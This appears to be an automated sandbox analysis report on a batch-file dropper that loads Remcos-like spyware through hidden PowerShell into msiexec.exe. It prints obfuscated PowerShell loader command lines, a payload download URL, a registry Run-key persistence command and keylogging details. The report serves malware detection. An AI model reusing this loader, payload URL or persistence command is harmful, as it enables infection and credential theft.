Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://plieltd.top/eYyaWC130.bin
Source: msiexec.exe, 0000000A.00000003.2556477286.0000000008890000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://plieltd.top/eYyaWC130.binEn
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
Source: bhv2369.tmp.18.dr String found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
Source: bhv2369.tmp.18.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: msiexec.exe, msiexec.exe, 00000014.00000002.2729724579.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: msiexec.exe String found in binary or memory: https://www.google.com/accounts/servicelogin
Source: bhv2369.tmp.18.dr String found in binary or memory: https://www.office.com/
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 52002 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52002
Source: unknown Network traffic detected: HTTP traffic on port 52023 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 52023
Source: unknown HTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:49710 version: TLS 1.2
Source: unknown HTTPS traffic detected: 37.230.62.86:443 -> 192.168.2.6:52002 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.21.56.189:443 -> 192.168.2.6:52023 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

barindex
Source: C:\Windows\SysWOW64\msiexec.exe Windows user hook set: 0 keyboard low level C:\Windows\System32\msiexec.exe Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0041183A OpenClipboard,GetLastError, 18_2_0041183A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 18_2_0040987A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 18_2_004098E2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 19_2_00406DFC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 19_2_00406E9F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard, 20_2_004068B5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard, 20_2_004072B5

E-Banking Fraud

barindex
Source: Yara match File source: 0000000A.00000003.2724664093.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.00000000088D4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2724664093.0000000008883000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.2704808533.0000000008882000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: msiexec.exe PID: 1948, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

System Summary

barindex
Source: amsi32_3796.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\msiexec.exe Process Stats: CPU usage > 49%
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 18_2_0040DD85
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00401806 NtdllDefWindowProc_W, 18_2_00401806
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004018C0 NtdllDefWindowProc_W, 18_2_004018C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004016FD NtdllDefWindowProc_A, 19_2_004016FD
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004017B7 NtdllDefWindowProc_A, 19_2_004017B7
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00402CAC NtdllDefWindowProc_A, 20_2_00402CAC
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00402D66 NtdllDefWindowProc_A, 20_2_00402D66
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347AB8F2 2_2_00007FFD347AB8F2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347AAB46 2_2_00007FFD347AAB46
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347A65FB 2_2_00007FFD347A65FB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347A4231 2_2_00007FFD347A4231
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347A26DD 2_2_00007FFD347A26DD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347A3BF3 2_2_00007FFD347A3BF3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD347A4C2D 2_2_00007FFD347A4C2D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3487A19A 2_2_00007FFD3487A19A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04C6E908 5_2_04C6E908
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04C6F1D8 5_2_04C6F1D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_04C6E5C0 5_2_04C6E5C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044B040 18_2_0044B040
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0043610D 18_2_0043610D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00447310 18_2_00447310
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044A490 18_2_0044A490
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0040755A 18_2_0040755A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0043C560 18_2_0043C560
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044B610 18_2_0044B610
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044D6C0 18_2_0044D6C0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004476F0 18_2_004476F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044B870 18_2_0044B870
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044081D 18_2_0044081D
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00414957 18_2_00414957
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004079EE 18_2_004079EE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00407AEB 18_2_00407AEB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044AA80 18_2_0044AA80
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00412AA9 18_2_00412AA9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00404B74 18_2_00404B74
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00404B03 18_2_00404B03
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_0044BBD8 18_2_0044BBD8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00404BE5 18_2_00404BE5
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00404C76 18_2_00404C76
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00415CFE 18_2_00415CFE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00416D72 18_2_00416D72
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00446D30 18_2_00446D30
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00446D8B 18_2_00446D8B
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00406E8F 18_2_00406E8F
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00405038 19_2_00405038
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0041208C 19_2_0041208C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004050A9 19_2_004050A9
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0040511A 19_2_0040511A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0043C13A 19_2_0043C13A
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004051AB 19_2_004051AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00449300 19_2_00449300
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0040D322 19_2_0040D322
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0044A4F0 19_2_0044A4F0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0043A5AB 19_2_0043A5AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00413631 19_2_00413631
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00446690 19_2_00446690
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0044A730 19_2_0044A730
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004398D8 19_2_004398D8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_004498E0 19_2_004498E0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0044A886 19_2_0044A886
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0043DA09 19_2_0043DA09
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00438D5E 19_2_00438D5E
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00449ED0 19_2_00449ED0
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_0041FE83 19_2_0041FE83
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 19_2_00430F54 19_2_00430F54
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_004050C2 20_2_004050C2
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_004014AB 20_2_004014AB
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00405133 20_2_00405133
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_004051A4 20_2_004051A4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00401246 20_2_00401246
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_0040CA46 20_2_0040CA46
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00405235 20_2_00405235
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_004032C8 20_2_004032C8
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00401689 20_2_00401689
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00402F60 20_2_00402F60
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004169A7 appears 87 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 0044DB70 appears 41 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 004165FF appears 35 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00422297 appears 42 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00444B5A appears 37 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00413025 appears 79 times
Source: C:\Windows\SysWOW64\msiexec.exe Code function: String function: 00416760 appears 69 times
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Udstiller35" /t REG_EXPAND_SZ /d "%Atlantad% -windowstyle 1 $Dogship=(gp -Path 'HKCU:\Software\Badder\').Trigonocephaly;%Atlantad% ($Dogship)"
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6102
Source: unknown Process created: Commandline size = 6126
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 6102 Jump to behavior
Source: amsi32_3796.amsi.csv, type: OTHER Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 2448, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine Classification label: mal100.troj.spyw.evad.winBAT@26/13@10/4
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free, 18_2_004182CE
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 20_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle, 20_2_00410DE1
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free, 18_2_00418758
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle, 18_2_00413D4C
Source: C:\Windows\SysWOW64\msiexec.exe Code function: 18_2_004148B6 FindResourceW,SizeofResource,LoadResource,LockResource, 18_2_004148B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Roaming\Satisfiable.Ins Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1472:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe Mutant created: \Sessions\1\BaseNamedObjects\Rmc-ASN50U
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6456:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3268:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_b1pb3zbc.hsw.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lista produkt#U00f3w POL56583753Sarchmentdoc.bat" "
Source: C:\Windows\SysWOW64\msiexec.exe System information queried: HandleInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=2448
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=3796
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: msiexec.exe, msiexec.exe, 00000013.00000002.2741104310.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: msiexec.exe, 00000012.00000002.2745333642.00000000051DD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: msiexec.exe, msiexec.exe, 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: C:\Windows\SysWOW64\msiexec.exe Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Lista produkt#U00f3w POL56583753Sarchmentdoc.bat" "
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj AnfgW KreieftenMaka6Svir4Unpr;Str, ParxLine6 Uns4.nde;beru beedrAfkavGoat:Gene1 Un 3Sang1 up.Miss0fo m) Mor AandGDiskeRee cturbkMorpo dta/Nive2 Res0Drop1slad0Skuf0Arch1K,nd0.dst1 Ri tetFAeroi ConrStofe ,lifEnteo ,dkxTreu/A,te1V ra3Cod 1 Hdr.Fo r0Etym ';$Signatarmagters=Dark ' reu FyrsBivoe PosRIle - alASneaG WayeIsodN J mTGe e ';$beskftigelsesinteressen=Dark 'Hre hS petTraft nkp Ka,sLoai:Inex/ Co /DowneConivYn leUndesIntaeVerdc TmrrCaroeOlivtPrin.M,timGou aCyl /LokaM,adeigarasRecefAutoo ylbrForlsL.rat,orpa Pina Po e.egil Slfs WifeKbenr RetnReckeRejs. Autp,heesGroum,itr ';$Unacute27mpastoed=Dark 'Volu> Nyt ';$Dolomitternes=Dark 'archiConsEForbX Skr ';$nyhedsbureauernes='Forfatningsdomstol';$Cynography='\Satisfiable.Ins';Nondeclaratively (Dark 'Hort$AmphgSyrilLa gOBo abVaa ASh nL Und:VellsFdsekTestiMassLBys.s We,mSterIStilsstokSHan eSt erGuld1reva8 Rov=Rumi$ FleeGiarNUnsuvCons: efeAT rbPMicrPH lkDSpriAAntiTForsAColi+Unfo$Ges.CFo.lYKam NSta OOp,jgFallR BriA .enpTrasHBarkyHyae ');Nondeclaratively (Dark ' ,ns$LavtgMonsL VinoCharB c aaCatcL D,n:sc,pKSambl regAL ngR ympLSpriAPsy GImmotba.keHortSGdni= par$SavsbMicreDiscSBrackMel FPyr TTilbI,oncGBe oe TimlEnchsBuckEBrneSExosIGaseN,aklTBlgee Ranr R,seChroSUnpesRek,e Eu NDise. DaySFolkpRedelIn biPuckTMed (Rage$PicaUMetaNClamAUdstCPastuA teTAeroE kse2 er7Gt,eMLa,dp.tagAVaans ikoTBarbOPulsEUngrdSamf)Himm ');Nondeclaratively (Dark $Unpliantness);$beskftigelsesinteressen=$Klarlagtes[0];$Kakar=(Dark 'tr.i$Tut g DenlR.adOVrdibCru aWordLs.de:.pkaGSkadROve,uOronnArkidEft V edgOOpfaL.rendFdesE ,roN OmgsPutr= BedNSlamED mpW rad-vapooFeatB IntjP liEKa,scRemstHumi FodbS hiy Ad,SSurrTS.ioESkosmTils. aefNOpbyEWhartLykk. RebW A.se AlbbCommcF rlLAn,eISla,ESam N PieTSeku ');Nondeclaratively ($Kakar);Nondeclaratively (Da
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Paremernes duplicature Udvejer Dataservicens Treasury Ostleress Uninterdicted #>;$Cryoscopy='Grusgrav';<#Dubbe Bantustamme Nyvurderende Tripudiate Mitigated #>; function Dark($Misligholdelsers){If ($host.DebuggerEnabled) {$Differentieringens++;}$Sadomasochism=$Cariss+$Misligholdelsers.'Length'-$Differentieringens; for( $Unacute27=4;$Unacute27 -lt $Sadomasochism;$Unacute27+=5){$Unaccommodable=$Unacute27;$Enforth+=$Misligholdelsers[$Unacute27];$Cutireaction='Blomstringstiderne';}$Enforth;}function Nondeclaratively($Budcyklen){ . ($Dolomitternes) ($Budcyklen);}$Skrllede=Dark 'StaiMC clo eftzF stiRagelRi elStyra ogn/Thra ';$Stupiditetens=Dark 'KrypTSvenl PresU ne1 nde2unav ';$Unpliantness=' lus[MashNFldee My T Fal.AnthsD coehistrru dVS stIEngrCBefaeTilgPTortO BogiSangNOpspTMa.iMNonfA awnNSkruASamlgLibeEZygoR lit]Vaga:Sovj:AlecSMyogECuphcP esUGennRDisci C aTSkjuy BasP iggRV.rgo Ga tGonioCam.c.eclOTrevlSvrm= Ven$Net sEndeTconcu.seuptomaiRoveDGoveIFagkT UnmE TraTGastEFravn R.ms Unp ';$Skrllede+=Dark 'Regi5Majo.Mau.0 Opd Simo(Tip WTer iF lgnChrodBusho Priw .orsUnsh j,nsN MolTBuff Fora1Side0Fod ..ast0Ni n;Vilj 